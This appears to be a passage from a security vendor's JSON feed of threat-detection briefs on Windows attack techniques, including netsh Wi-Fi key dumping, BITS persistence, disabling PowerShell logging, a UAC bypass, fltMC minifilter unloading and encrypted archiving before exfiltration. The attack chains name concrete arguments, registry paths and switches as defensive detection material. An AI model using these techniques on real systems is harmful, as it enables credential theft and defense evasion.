{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/defender-xdr/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["high"],"_cs_tags":["credential-access","netsh","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers often target wireless credentials to gain unauthorized network access. This involves using the legitimate Windows command-line tool \u003ccode\u003enetsh.exe\u003c/code\u003e to extract Wi-Fi passwords stored on a compromised system. By leveraging \u003ccode\u003enetsh\u003c/code\u003e, attackers can bypass traditional security measures and retrieve sensitive information without deploying custom malware. The technique involves specific command-line arguments that instruct \u003ccode\u003enetsh\u003c/code\u003e to display wireless keys in cleartext, exposing the network passwords. Defenders must monitor \u003ccode\u003enetsh\u003c/code\u003e command-line activity to identify potential credential access attempts. 
This activity can lead to lateral movement within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., via phishing or exploiting a software vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enetsh.exe\u003c/code\u003e with specific arguments to list available wireless profiles.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target wireless profile from the list.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enetsh.exe\u003c/code\u003e again, this time specifying the target profile and requesting the key to be displayed in cleartext using the \u003ccode\u003ekey=clear\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNetsh.exe\u003c/code\u003e retrieves the Wi-Fi password from the Windows Wireless LAN service.\u003c/li\u003e\n\u003cli\u003eThe password is displayed in the command output, which the attacker captures.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the obtained Wi-Fi password to connect to the wireless network.\u003c/li\u003e\n\u003cli\u003eThe attacker can now perform lateral movement and access internal resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful credential dumping allows attackers to gain unauthorized access to wireless networks. This can lead to lateral movement within the organization\u0026rsquo;s network, access to sensitive data, and further compromise of systems and resources. The impact includes potential data breaches, financial losses, and reputational damage. 
This technique allows attackers to bypass traditional network access controls.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Wireless Credential Dumping via Netsh\u003c/code\u003e to identify suspicious \u003ccode\u003enetsh.exe\u003c/code\u003e commands in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the \u003ccode\u003enetsh.exe\u003c/code\u003e command-line arguments.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the process lineage and user context as outlined in the \u0026ldquo;Triage and analysis\u0026rdquo; section of the source.\u003c/li\u003e\n\u003cli\u003eImplement strong password policies for Wi-Fi networks, including the use of WPA2 or WPA3 encryption.\u003c/li\u003e\n\u003cli\u003eReview and restrict the use of \u003ccode\u003enetsh.exe\u003c/code\u003e on systems where it is not required, using application control solutions.\u003c/li\u003e\n\u003cli\u003eMonitor for related alerts indicating lateral movement, staging, remote access, or persistence, as mentioned in the \u0026ldquo;Triage and analysis\u0026rdquo; section of the source.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T12:00:00Z","date_published":"2024-01-30T12:00:00Z","id":"/briefs/2024-01-30-wireless-creds-dumping/","summary":"Adversaries use the Windows built-in utility Netsh to dump Wireless saved access keys in clear text, potentially leading to credential compromise.","title":"Wireless Credential Dumping via Netsh","url":"https://feed.craftedsignal.io/briefs/2024-01-30-wireless-creds-dumping/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","SentinelOne Cloud 
Funnel"],"_cs_severities":["medium"],"_cs_tags":["persistence","bits","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThe Background Intelligent Transfer Service (BITS) is a Windows service used for asynchronous, prioritized, and throttled file transfers. Attackers can abuse BITS to establish persistence by using the \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e method to execute a program after a BITS job completes or enters a specific state. This technique allows adversaries to run arbitrary code with elevated privileges, bypassing traditional security measures. The detection rule identifies suspicious processes initiated by BITS, excluding known legitimate executables like \u003ccode\u003eWerFaultSecure.exe\u003c/code\u003e, \u003ccode\u003eWerFault.exe\u003c/code\u003e, \u003ccode\u003ewermgr.exe\u003c/code\u003e, and \u003ccode\u003edirectxdatabaseupdater.exe\u003c/code\u003e. This behavior can be employed to maintain access to a compromised system, even after a reboot or user logout. 
Defenders need to monitor BITS activity for unusual command-line executions to detect and prevent potential persistence attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through other means (e.g., phishing, exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the BITSAdmin tool or PowerShell cmdlets to create a new BITS job.\u003c/li\u003e\n\u003cli\u003eThe attacker configures the BITS job to download a malicious payload or execute a malicious script.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e method to set a command that will be executed upon job completion or a specified state change.\u003c/li\u003e\n\u003cli\u003eThe BITS service executes the specified command, which can be a script interpreter (e.g., \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e) or a malicious executable.\u003c/li\u003e\n\u003cli\u003eThe malicious command downloads or executes further payloads, establishing persistence on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access, allowing them to execute commands, steal data, or perform other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to compromised systems. This can lead to data theft, further malware deployment, or complete system compromise. The BITS service runs with elevated privileges, so any command executed via \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e will also run with those privileges. 
This persistence mechanism is difficult to detect because BITS is a legitimate Windows service, and its activity can be easily masked as normal system operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for processes spawned by \u003ccode\u003esvchost.exe\u003c/code\u003e with arguments containing \u0026ldquo;BITS\u0026rdquo; but not in the exclusion list (WerFaultSecure.exe, WerFault.exe, wermgr.exe, directxdatabaseupdater.exe) using the \u0026ldquo;Persistence via BITS Job Notify Cmdline\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Suspicious BITS Job Creation\u0026rdquo; to identify unusual BITS job creation activities.\u003c/li\u003e\n\u003cli\u003eReview BITS job configurations on systems to identify and remove any unauthorized or suspicious jobs.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture detailed information about process execution, including parent-child relationships and command-line arguments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T10:00:00Z","date_published":"2024-01-26T10:00:00Z","id":"/briefs/2024-01-26-bits-persistence/","summary":"Adversaries can achieve persistence by abusing the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program after a job finishes, leading to arbitrary code execution and system compromise.","title":"Persistence via BITS Job Notify Cmdline","url":"https://feed.craftedsignal.io/briefs/2024-01-26-bits-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Cloud Endpoint","AutomationManagerAgent"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","powershell","registry"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Trend Micro","N-able"],"content_html":"\u003cp\u003eAttackers frequently disable PowerShell Script Block Logging to 
evade detection and hide malicious activities on compromised systems. By modifying the \u003ccode\u003eEnableScriptBlockLogging\u003c/code\u003e registry value to \u0026lsquo;0\u0026rsquo; or \u0026lsquo;0x00000000\u0026rsquo;, adversaries can significantly reduce the visibility into their PowerShell-based attacks. This technique is particularly effective when followed by script-driven activity, making it harder for security teams to identify and respond to threats. This behavior has been observed across multiple environments, including those utilizing endpoint detection and response solutions such as Elastic Defend, Microsoft Defender XDR, SentinelOne, and CrowdStrike. The rule was last updated on 2026-05-04 and is designed to detect these specific registry modifications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker gains initial access to a Windows system, possibly through phishing or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker may attempt to escalate privileges to gain necessary permissions to modify the registry.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDefense Evasion:\u003c/strong\u003e The attacker modifies the registry to disable PowerShell Script Block Logging by setting \u003ccode\u003eHKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging\u003c/code\u003e to 0 or 0x00000000 using \u003ccode\u003ereg.exe\u003c/code\u003e or PowerShell itself.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution:\u003c/strong\u003e The attacker executes malicious PowerShell scripts, leveraging the disabled logging to avoid detection. 
These scripts may be used for reconnaissance, lateral movement, or data exfiltration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker establishes persistence using various techniques, such as creating scheduled tasks or modifying registry keys to ensure continued access to the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control:\u003c/strong\u003e The attacker establishes a command and control channel to communicate with the compromised system and issue further instructions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker moves laterally to other systems on the network, compromising additional assets.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker achieves their final objective, such as data theft, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful disabling of PowerShell Script Block Logging can severely hinder incident response efforts, allowing attackers to operate undetected for extended periods. Organizations may experience data breaches, financial losses, and reputational damage. The impact can be widespread as attackers leverage compromised systems for lateral movement and further exploitation. 
The loss of PowerShell logging can blind security teams, making it difficult to reconstruct attacker actions and contain the breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePowerShell_Script_Block_Logging_Disabled\u003c/code\u003e to your SIEM to detect registry modifications that disable PowerShell Script Block Logging.\u003c/li\u003e\n\u003cli\u003eMonitor registry events for changes to the \u003ccode\u003eEnableScriptBlockLogging\u003c/code\u003e value, focusing on events with \u003ccode\u003eregistry.data.strings\u003c/code\u003e set to \u0026ldquo;0\u0026rdquo; or \u0026ldquo;0x00000000\u0026rdquo; (see rule \u003ccode\u003ePowerShell_Script_Block_Logging_Disabled\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to capture the necessary data for the Sigma rules to function effectively (see references).\u003c/li\u003e\n\u003cli\u003eReview and harden PowerShell execution policies to prevent unauthorized script execution (related to tactic TA0005).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit who can modify registry settings related to PowerShell logging (related to tactic TA0005).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T10:00:00Z","date_published":"2024-01-09T10:00:00Z","id":"/briefs/2024-01-09-disable-powershell-scriptblock-logging/","summary":"Attackers may disable PowerShell Script Block Logging by modifying the registry to conceal their activities on the host and evade detection by setting the `EnableScriptBlockLogging` registry value to 0, impacting security monitoring and incident response capabilities.","title":"PowerShell Script Block Logging Disabled via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-09-disable-powershell-scriptblock-logging/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender 
XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["uac-bypass","privilege-escalation","windows","diskcleanup","scheduled-task"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule identifies User Account Control (UAC) bypass attempts via hijacking the DiskCleanup Scheduled Task. Attackers exploit this method to execute code with elevated privileges, bypassing standard security controls. The technique involves leveraging the \u003ccode\u003ecleanmgr.exe\u003c/code\u003e or \u003ccode\u003etaskhostw.exe\u003c/code\u003e executables with specific arguments (\u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e) outside of their expected paths. This allows attackers to run malicious code under the guise of a legitimate system process, making detection more challenging. This technique is used to gain elevated privileges on a compromised system, allowing for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., via phishing or exploiting a software vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker modifies or creates a scheduled task to execute \u003ccode\u003ecleanmgr.exe\u003c/code\u003e or \u003ccode\u003etaskhostw.exe\u003c/code\u003e with the \u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e arguments.\u003c/li\u003e\n\u003cli\u003eThe modified scheduled task is triggered, executing the specified executable with the supplied arguments.\u003c/li\u003e\n\u003cli\u003eThe executable, such as \u003ccode\u003ecleanmgr.exe\u003c/code\u003e, attempts to run Disk Cleanup.\u003c/li\u003e\n\u003cli\u003eIf the executable path is outside the standard locations (e.g., \u003ccode\u003eC:\\Windows\\System32\u003c/code\u003e or 
\u003ccode\u003eC:\\Windows\\SysWOW64\u003c/code\u003e), it indicates a potential hijack.\u003c/li\u003e\n\u003cli\u003eMalicious code is executed with elevated privileges due to the UAC bypass.\u003c/li\u003e\n\u003cli\u003eThe attacker uses these elevated privileges to install malware, modify system settings, or perform other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to bypass User Account Control (UAC) and execute code with elevated privileges. This can lead to the installation of malware, modification of system settings, data theft, and other malicious activities. While the exact number of victims is unknown, this technique is effective on systems where UAC is enabled but misconfigured or vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;UAC Bypass via DiskCleanup with Suspicious Path\u0026rdquo; to your SIEM and tune for your environment to detect UAC bypass attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;UAC Bypass via DiskCleanup and Taskhostw\u0026rdquo; to your SIEM to detect UAC bypass attempts.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003ecleanmgr.exe\u003c/code\u003e and \u003ccode\u003etaskhostw.exe\u003c/code\u003e with the \u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e arguments, focusing on executions outside the standard system directories.\u003c/li\u003e\n\u003cli\u003eReview and harden scheduled tasks to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eEnsure that UAC settings are properly configured and enforced across the 
organization.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-uac-bypass-diskcleanup/","summary":"Attackers bypass User Account Control (UAC) by hijacking the DiskCleanup Scheduled Task to stealthily execute code with elevated permissions on Windows systems.","title":"UAC Bypass via DiskCleanup Scheduled Task Hijack","url":"https://feed.craftedsignal.io/briefs/2024-01-uac-bypass-diskcleanup/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows","Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","windows","masquerading"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Intel","IBM"],"content_html":"\u003cp\u003eThis detection identifies process execution from suspicious default Windows directories. Attackers may hide malware in trusted paths to evade defenses, making it difficult for analysts to distinguish between legitimate and malicious activity. The detection focuses on identifying processes running from directories like C:\\PerfLogs, C:\\Users\\Public, and various Windows subdirectories (e.g., C:\\Windows\\Tasks, C:\\Windows\\AppReadiness), where executable files are not typically expected to reside. The detection excludes known legitimate processes like SpeechUXWiz.exe, SystemSettings.exe, TrustedInstaller.exe and other Intel and IBM executables to reduce false positives. This technique is often used to bypass security controls or take advantage of existing exceptions applied to these directories. 
This activity was observed being used by threat actors in the Siestagraph campaign.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable into a suspicious directory like C:\\Users\\Public or C:\\Windows\\Tasks.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malware from the unusual directory. This might be achieved using \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed malware establishes persistence by creating a scheduled task or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware connects to a command-and-control (C2) server to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe C2 server instructs the malware to perform reconnaissance on the network.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to move laterally to other systems on the network using techniques like pass-the-hash or exploiting vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration, ransomware deployment, or establishing long-term access to the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code, persistence on the system, and further compromise of the network. Attackers can use this technique to bypass security controls and evade detection, potentially leading to data breaches, financial loss, or disruption of services. 
While the rule itself has a medium severity, the impact of a successful attack using this technique can be severe, depending on the attacker\u0026rsquo;s objectives and the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Process Execution from Unusual Directory\u0026rdquo; to your SIEM and tune for your environment to detect suspicious process execution.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine if the process execution is legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging, specifically Event ID 4688 with command line process auditing, to ensure the Sigma rule has the necessary data to function effectively.\u003c/li\u003e\n\u003cli\u003eReview and harden permissions on the listed suspicious directories to prevent unauthorized file creation and execution.\u003c/li\u003e\n\u003cli\u003eBlock execution of unsigned or untrusted executables from these directories using application control solutions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-process-execution-from-unusual-directory/","summary":"Adversaries may execute processes from unusual default Windows directories to masquerade malware and evade defenses by blending in with trusted paths, making malicious activity harder to detect.","title":"Process Execution from Suspicious Windows Directories","url":"https://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Endpoint Security","UEMS_Agent","SentinelOne Cloud 
Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","filter-driver","fltMC.exe","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","ManageEngine","Bitdefender","SentinelOne"],"content_html":"\u003cp\u003eThe Filter Manager Control Program (fltMC.exe) is a Windows utility used to manage filter drivers, also known as minifilters. These minifilters are leveraged by various security products, including EDR, antivirus solutions, and data loss prevention tools, to intercept and modify I/O requests. Attackers can abuse fltMC.exe to unload these minifilters, effectively disabling or circumventing the security measures they provide. This allows malicious actors to operate without detection, potentially leading to data breaches, malware infections, or other harmful activities. This technique has been observed being used to disable security products such as Bitdefender, SentinelOne and ManageEngine Endpoint Central.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the target system (e.g., via compromised credentials or exploit).\u003c/li\u003e\n\u003cli\u003eAttacker executes \u003ccode\u003efltMC.exe\u003c/code\u003e with administrative privileges.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efltMC.exe\u003c/code\u003e attempts to unload a specific filter driver (minifilter).\u003c/li\u003e\n\u003cli\u003eThe operating system processes the request to unload the specified filter driver.\u003c/li\u003e\n\u003cli\u003eIf successful, the targeted minifilter is removed from the active filter stack.\u003c/li\u003e\n\u003cli\u003eSecurity software relying on the unloaded minifilter ceases to function correctly, leaving a security gap.\u003c/li\u003e\n\u003cli\u003eAttacker performs malicious actions, such as deploying malware or exfiltrating sensitive data, without the protection of the disabled filter driver.\u003c/li\u003e\n\u003cli\u003eAttacker achieves their 
objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to disable or circumvent security controls, increasing the likelihood of successful malware infections, data breaches, and other malicious activities. The scope of impact depends on the specific filter driver unloaded and the security products it supports. Disabling a critical EDR minifilter could leave the entire system vulnerable, while disabling a less critical filter might only impact a subset of security features.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efltMC.exe\u003c/code\u003e with the \u003ccode\u003eunload\u003c/code\u003e argument to identify potential evasion attempts (see Sigma rule \u0026ldquo;Potential Evasion via Filter Manager\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003efltMC.exe\u003c/code\u003e execution where the parent process is not a known and trusted system management tool.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit the ability of users to execute \u003ccode\u003efltMC.exe\u003c/code\u003e or modify filter driver configurations.\u003c/li\u003e\n\u003cli\u003eReview the list of exclusions in the provided EQL query to identify any legitimate software that may be generating false positives.\u003c/li\u003e\n\u003cli\u003eEnsure that endpoint security solutions are properly configured and monitored to detect and prevent unauthorized filter driver modifications.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to activate the rules above.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-filter-manager-evasion/","summary":"Adversaries may abuse 
the Filter Manager Control Program (fltMC.exe) to unload filter drivers, thereby evading security software defenses such as malware detection and file system monitoring.","title":"Potential Defense Evasion via Filter Manager (fltMC.exe)","url":"https://feed.craftedsignal.io/briefs/2024-01-filter-manager-evasion/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","ICA Client","SARemediation","Endpoint Connect"],"_cs_severities":["medium"],"_cs_tags":["credential-access","persistence","registry-modification"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Citrix","Dell","CheckPoint"],"content_html":"\u003cp\u003eAttackers may modify the network logon provider registry to gain persistence or access credentials. This involves registering a rogue network logon provider module that intercepts authentication credentials in clear text during user logon. The modification of the ProviderPath key under the NetworkProvider service registry path can be indicative of this malicious activity. The registry modification is often performed by non-system accounts and the adversary will attempt to hide the malicious DLL by placing it in common directories. 
This technique allows adversaries to steal user credentials or maintain persistent access to the compromised system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through exploiting a vulnerability or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker elevates privileges to obtain the necessary permissions to modify the registry.\u003c/li\u003e\n\u003cli\u003eThe attacker locates the registry key related to network logon providers: \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\*\\NetworkProvider\\ProviderPath\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the \u003ccode\u003eProviderPath\u003c/code\u003e registry value to point to a malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe system loads the malicious DLL during the logon process.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL intercepts user credentials in clear text.\u003c/li\u003e\n\u003cli\u003eThe attacker harvests the intercepted credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the harvested credentials for lateral movement or further exploitation of the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of user credentials, allowing attackers to gain unauthorized access to sensitive systems and data. Modification of the network logon provider registry enables attackers to maintain persistent access to the compromised system, even after a reboot. This can result in data breaches, financial losses, and reputational damage. 
The severity depends on the level of access granted to the compromised accounts and the sensitivity of the data they can access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor registry modifications to the \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\*\\NetworkProvider\\ProviderPath\u003c/code\u003e key, using the provided Sigma rule to detect suspicious changes.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to capture registry modifications.\u003c/li\u003e\n\u003cli\u003eRegularly audit network logon providers and verify the integrity and authenticity of the registered DLLs.\u003c/li\u003e\n\u003cli\u003eInvestigate processes modifying the registry and their associated file creation events for unknown or suspicious processes.\u003c/li\u003e\n\u003cli\u003eBlock execution of unsigned or untrusted DLLs in the network logon provider path.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Network Logon Provider Registry Modification\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-network-logon-provider-modification/","summary":"Adversaries may modify the network logon provider registry to register a rogue network logon provider module for persistence and credential access by intercepting authentication credentials in clear text during user logon.","title":"Network Logon Provider Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-network-logon-provider-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["collection","archive","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers frequently compress and 
encrypt data before exfiltration to reduce the volume sent over the network and to hide the contents from inspection. This behavior usually indicates a later stage of an intrusion, where the attacker has already collected sensitive data and is preparing to move it out of the environment. Archiving tools such as WinRAR and 7-Zip accept encryption switches on the command line, so an attacker can password-protect the stolen data without any custom tooling, and a password-protected archive defeats content inspection both on the wire and at rest. This technique has been used by multiple threat actors, including Turla, as documented by WeLiveSecurity. This brief focuses on detecting command-line activity indicative of archive creation with encryption using WinRAR or 7-Zip on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to the system through methods such as phishing, exploiting vulnerabilities, or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker obtains additional credentials, for example by dumping them with a tool such as Mimikatz.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker performs reconnaissance to identify sensitive data and systems of interest.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The attacker gathers sensitive data from various locations on the compromised system or network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArchive Creation:\u003c/strong\u003e The attacker uses WinRAR or 7-Zip to create an encrypted archive of the collected data. With \u003ccode\u003erar.exe\u003c/code\u003e or \u003ccode\u003eWinRAR.exe\u003c/code\u003e the switches \u003ccode\u003e-p\u003c/code\u003e or \u003ccode\u003e/p\u003c/code\u003e set a password that encrypts the file data, while \u003ccode\u003e-hp\u003c/code\u003e or \u003ccode\u003e/hp\u003c/code\u003e also encrypt the archive headers, hiding the file names; with \u003ccode\u003e7z.exe\u003c/code\u003e or \u003ccode\u003e7za.exe\u003c/code\u003e the \u003ccode\u003e-p\u003c/code\u003e switch sets the password, optionally combined with \u003ccode\u003e-mhe=on\u003c/code\u003e to encrypt the headers as well.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The encrypted archive is moved to a staging location, such as a temporary directory or removable media.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration:\u003c/strong\u003e The attacker exfiltrates the encrypted archive from the network using various methods, such as FTP, SCP, or cloud storage services.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCovering Tracks:\u003c/strong\u003e The attacker deletes the archive from 